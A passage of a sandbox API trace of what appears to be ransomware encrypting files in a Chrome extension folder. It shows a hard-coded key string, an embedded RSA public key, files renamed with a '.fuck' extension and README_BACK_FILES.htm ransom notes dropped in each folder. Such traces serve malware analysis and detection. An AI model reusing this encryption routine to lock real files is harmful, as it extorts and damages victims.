data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.gsg")) returned 1 [0252.891] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.fuck")) returned 1 [0252.892] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0252.892] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.892] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.892] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0252.892] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2985a20 [0252.902] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.902] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.903] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0252.903] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.903] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.903] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.903] GetLastError () returned 0x0 [0252.903] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json")) returned 0x20 [0252.904] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0252.905] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.905] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.906] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.906] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d3c8) returned 1 [0252.908] CryptCreateHash (in: hProv=0x298d3c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.908] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.908] CryptHashData (hHash=0x29846a0, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.908] CryptDeriveKey (in: hProv=0x298d3c8, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29847e0) returned 1 [0252.909] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.909] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.909] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298cb48) returned 1 [0252.909] CryptImportPublicKeyInfo (in: hCryptProv=0x298cb48, dwCertEncodingType=0x1, pInfo=0x2993bc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993bf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993bf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29848a0) returned 1 [0252.909] CryptEncrypt (in: hKey=0x29848a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.909] CryptEncrypt (in: hKey=0x29848a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298c708*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298c708*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.910] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298c708*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298c708*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.911] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfe, lpOverlapped=0x0) returned 1 [0252.912] CryptEncrypt (in: hKey=0x29847e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfe, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0252.912] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0252.912] CloseHandle (hObject=0x5d60) returned 1 [0252.912] CloseHandle (hObject=0x5d5c) returned 1 [0252.912] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0252.915] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0252.916] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.gsg")) returned 1 [0252.917] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.fuck")) returned 1 [0252.918] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.919] CryptDestroyKey (hKey=0x29847e0) returned 1 [0252.919] CryptReleaseContext (hProv=0x298d3c8, dwFlags=0x0) returned 1 [0252.919] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.919] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0252.919] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0252.919] AreFileApisANSI () returned 1 [0252.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0252.919] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.920] GetFileType (hFile=0x5d50) returned 0x1 [0252.920] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.921] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.921] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0252.921] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.921] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.921] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.921] GetLastError () returned 0x0 [0252.922] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json")) returned 0x20 [0252.922] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0252.922] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.923] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.924] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.925] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d560) returned 1 [0252.927] CryptCreateHash (in: hProv=0x298d560, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.927] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.927] CryptHashData (hHash=0x29846a0, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.927] CryptDeriveKey (in: hProv=0x298d560, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0252.927] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.927] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.927] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298cc58) returned 1 [0252.928] CryptImportPublicKeyInfo (in: hCryptProv=0x298cc58, dwCertEncodingType=0x1, pInfo=0x2993d60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993d90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993d98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984ae0) returned 1 [0252.928] CryptEncrypt (in: hKey=0x2984ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.928] CryptEncrypt (in: hKey=0x2984ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298c818*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298c818*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.928] WriteFile (in: hFile=0x5d60, lpBuffer=0x298c818*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298c818*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.929] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x12f, lpOverlapped=0x0) returned 1 [0252.931] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x12f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0252.931] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0252.931] CloseHandle (hObject=0x5d5c) returned 1 [0252.931] CloseHandle (hObject=0x5d60) returned 1 [0252.931] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0252.935] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0252.936] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0252.937] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0252.938] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.938] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0252.938] CryptReleaseContext (hProv=0x298d560, dwFlags=0x0) returned 1 [0252.938] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.938] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0252.938] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0252.939] AreFileApisANSI () returned 1 [0252.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0252.939] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.939] GetFileType (hFile=0x5d50) returned 0x1 [0252.940] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.941] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.941] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0252.941] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.941] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.941] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.942] GetLastError () returned 0x0 [0252.942] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json")) returned 0x20 [0252.943] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0252.943] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.944] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 